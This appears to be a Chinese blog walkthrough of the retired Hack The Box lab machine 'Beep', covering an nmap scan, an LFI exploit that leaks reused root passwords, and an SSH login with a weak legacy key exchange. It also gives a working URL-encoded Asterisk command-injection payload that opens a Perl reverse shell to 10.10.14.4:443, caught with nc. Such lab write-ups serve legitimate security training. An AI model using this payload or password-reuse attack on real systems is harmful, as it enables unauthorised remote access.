• HTB-靶机-Beep


    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.7

    nmap -sV -sC -p- -oN beep.nmap 10.10.10.7

    nmap扫描结果

    开放了很多端口,先看web应用

    爆破下目录看看

    上面先放着既然知道目标靶机使用的程序名称,那么根据关键字搜索下是否可利用的exploit

    试了下上述给的exploit,其中LFI是比较靠谱的,对应的exploit是37637.pl   https://www.exploit-db.com/exploits/37637

    直接利用

    显示不友好,查看网页源码

    发现很多都是共同使用上述标记的密码,直接使用ssh进行连接

    发现报错,复制上面的报错丢到网上搜索下发现原因是Terminal找不到支持的密钥交换方法,因为新版Openssh中认为SHA1这种hash散列算法过于薄弱,已经不再支持,所以我们需要手动去允许对于SHA1的支持 ,所以可以确认目标靶机是使用的低版本的弱加密算法,而本机的kali是使用的最新版ssh,不支持旧版的,需要指定加密算法进行ssh连接即可

    ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 10.10.10.7 -l root

    成功登录到目标靶机,直接读取root.txt 和user.txt

    根据下面提到的exploitdb 提炼出手动和自动弹shell的操作

    https://www.exploit-db.com/exploits/37637

    https://www.exploit-db.com/exploits/18650

    https://www.exploit-db.com/exploits/21851

    手动利用

    https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.4%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A

    本机使用nc监听443即可

    使用burpsuite手动利用webmin 根据:https://www.exploit-db.com/exploits/21851

    自动利用

    下面是根据:https://www.exploit-db.com/exploits/21851

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    django报错信息解决办法
    postgresql数据库的基本使用
    Ubuntu 18.04中安装PostgreSQL(PSQL)
    Ubuntu 18.04 安装 PyCharm
    在Ubuntu中安装Docker和docker的使用
    ubuntu怎么切换到root用户,切换到root账号方法
    centos7彻底卸载mysql和通过yum安装mysql
    django运行时报错处理方法
    Django 查询时间段 时间搜索 过滤
    View Controller Programming Guide for iOS---(四)---Creating Custom Content View Controllers
  • 原文地址:https://www.cnblogs.com/autopwn/p/13900862.html
Copyright © 2020-2023  润新知